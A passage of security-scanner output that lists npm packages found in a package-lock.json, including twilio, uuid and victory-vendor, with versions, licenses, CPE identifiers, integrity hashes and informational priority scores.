priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d407f6f6881f51f1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: twilio 5.13.1'
title: twilio 5.13.1
description: 'Package discovered: twilio 5.13.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b26b672319df2e47
name: twilio
version: 5.13.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:twilio:twilio:5.13.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/twilio@5.13.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/twilio/-/twilio-5.13.1.tgz
integrity: sha512-sT+PkhptF4Mf7t8eXFFvPQx4w5VHnBIPXbltGPMFRe+R2GxfRdMuFbuNA/cEm0aQR6LFQOn33+fhClg+TjRVqQ==
dependencies:
axios: ^1.13.5
dayjs: ^1.11.9
https-proxy-agent: ^5.0.0
jsonwebtoken: ^9.0.3
qs: ^6.14.1
scmp: ^2.1.0
xmlbuilder: ^13.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1b446cdccc9a93b0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: type-is 1.6.18'
title: type-is 1.6.18
description: 'Package discovered: type-is 1.6.18'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a8ca97010550105a
name: type-is
version: 1.6.18
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:type-is:type-is:1.6.18:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:type-is:type_is:1.6.18:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:type_is:type-is:1.6.18:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:type_is:type_is:1.6.18:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:type:type-is:1.6.18:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:type:type_is:1.6.18:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/type-is@1.6.18
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz
integrity: sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==
dependencies:
media-typer: 0.3.0
mime-types: ~2.1.24
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a01b70906be81bf9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: typedarray 0.0.6'
title: typedarray 0.0.6
description: 'Package discovered: typedarray 0.0.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e635ba578a775ab5
name: typedarray
version: 0.0.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:typedarray:typedarray:0.0.6:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/typedarray@0.0.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz
integrity: sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 730b4341f8da3a62
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: undici-types 6.21.0'
title: undici-types 6.21.0
description: 'Package discovered: undici-types 6.21.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9968e425c772df9f
name: undici-types
version: 6.21.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:undici-types:undici-types:6.21.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:undici-types:undici_types:6.21.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:undici_types:undici-types:6.21.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:undici_types:undici_types:6.21.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:undici:undici-types:6.21.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:undici:undici_types:6.21.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/undici-types@6.21.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz
integrity: sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a49eb5c706dbb178
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: unicode-properties 1.4.1'
title: unicode-properties 1.4.1
description: 'Package discovered: unicode-properties 1.4.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 541fbe3121e73dce
name: unicode-properties
version: 1.4.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:unicode-properties:unicode-properties:1.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode-properties:unicode_properties:1.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode_properties:unicode-properties:1.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode_properties:unicode_properties:1.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode:unicode-properties:1.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode:unicode_properties:1.4.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/unicode-properties@1.4.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.4.1.tgz
integrity: sha512-CLjCCLQ6UuMxWnbIylkisbRj31qxHPAurvena/0iwSVbQ2G1VY5/HjV0IRabOEbDHlzZlRdCrD4NhB0JtU40Pg==
dependencies:
base64-js: ^1.3.0
unicode-trie: ^2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d33b9ca7e3f48cc1
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: unicode-trie 2.0.0'
title: unicode-trie 2.0.0
description: 'Package discovered: unicode-trie 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: aac566dbf0b492ea
name: unicode-trie
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:unicode-trie:unicode-trie:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode-trie:unicode_trie:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode_trie:unicode-trie:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode_trie:unicode_trie:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode:unicode-trie:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:unicode:unicode_trie:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/unicode-trie@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz
integrity: sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ==
dependencies:
pako: ^0.2.5
tiny-inflate: ^1.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4121fde58e5100ef
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: unpipe 1.0.0'
title: unpipe 1.0.0
description: 'Package discovered: unpipe 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 294cc6dab10e14ff
name: unpipe
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:unpipe:unpipe:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/unpipe@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz
integrity: sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0c87db67edbd6edf
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: update-browserslist-db 1.2.3'
title: update-browserslist-db 1.2.3
description: 'Package discovered: update-browserslist-db 1.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7776752fe1d43a3e
name: update-browserslist-db
version: 1.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:update-browserslist-db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update-browserslist-db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update_browserslist_db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update_browserslist_db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update-browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update-browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update_browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update_browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update:update-browserslist-db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:update:update_browserslist_db:1.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/update-browserslist-db@1.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz
integrity: sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==
dependencies:
escalade: ^3.2.0
picocolors: ^1.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1ae47d19bb25f29a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: util-deprecate 1.0.2'
title: util-deprecate 1.0.2
description: 'Package discovered: util-deprecate 1.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: aac5900c84ec45ff
name: util-deprecate
version: 1.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:util-deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:util-deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:util_deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:util_deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:util:util-deprecate:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:util:util_deprecate:1.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/util-deprecate@1.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz
integrity: sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ea9355f8957e8bab
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: utils-merge 1.0.1'
title: utils-merge 1.0.1
description: 'Package discovered: utils-merge 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4f715b1e9b38109a
name: utils-merge
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:utils-merge:utils-merge:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:utils-merge:utils_merge:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:utils_merge:utils-merge:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:utils_merge:utils_merge:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:utils:utils-merge:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:utils:utils_merge:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/utils-merge@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz
integrity: sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 236364fea165c402
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: uuid 10.0.0'
title: uuid 10.0.0
description: 'Package discovered: uuid 10.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 21b622d3d64a2c86
name: uuid
version: 10.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:uuid:uuid:10.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/uuid@10.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz
integrity: sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2fb790bc55d11030
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: uuid 8.3.2'
title: uuid 8.3.2
description: 'Package discovered: uuid 8.3.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8cf0c19ede45d1bc
name: uuid
version: 8.3.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:uuid:uuid:8.3.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/uuid@8.3.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz
integrity: sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3e2f0913d0055c91
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: uuid 9.0.1'
title: uuid 9.0.1
description: 'Package discovered: uuid 9.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0bd59342bab05265
name: uuid
version: 9.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:uuid:uuid:9.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/uuid@9.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz
integrity: sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4e3576c544465abd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: vary 1.1.2'
title: vary 1.1.2
description: 'Package discovered: vary 1.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2fc27b955ce3ef5d
name: vary
version: 1.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:vary:vary:1.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/vary@1.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/vary/-/vary-1.1.2.tgz
integrity: sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 60e43c65d8e9a8e6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: victory-vendor 36.9.2'
title: victory-vendor 36.9.2
description: 'Package discovered: victory-vendor 36.9.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 14c55cee8eb4e77f
name: victory-vendor
version: 36.9.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT AND ISC
spdxExpression: MIT AND ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:victory-vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:victory-vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:victory_vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:victory_vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:victory:victory-vendor:36.9.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:victory:victory_vendor:36.9.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/victory-vendor@36.9.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/victory-vendor/-/victory-vendor-36.9.2.tgz
integrity: sha512-PnpQQMuxlwYdocC8fIJqVXvkeViHYzotI+NJrCuav0ZYFoq912ZHBk3mCeuj+5/VpodOjPe1z0Fk2ihgzlXqjQ==
dependencies:
'@types/d3-array': ^3.0.3
'@types/d3-ease': ^3.0.0
'@types/d3-interpolate': ^3.0.1
'@types/d3-scale': ^4.0.2
'@types/d3-shape': ^3.1.0
'@types/d3-time': ^3.0.0
'@types/d3-timer': ^3.0.0
d3-array: ^3.1.6
d3-ease: ^3.0.1
d3-interpolate: ^3.0.1
d3-scale: ^4.0.2
d3-shape: ^3.1.0
d3-time: ^3.0.0
d3-timer: ^3.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a846a040ec49fd72
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: vite-compatible-readable-stream 3.6.1'
title: vite-compatible-readable-stream 3.6.1
description: 'Package discovered: vite-compatible-readable-stream 3.6.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 874d0721c00b1770
name: vite-compatible-readable-stream
version: 3.6.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:vite-compatible-readable-stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite-compatible-readable-stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:vite_compatible_readable_stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
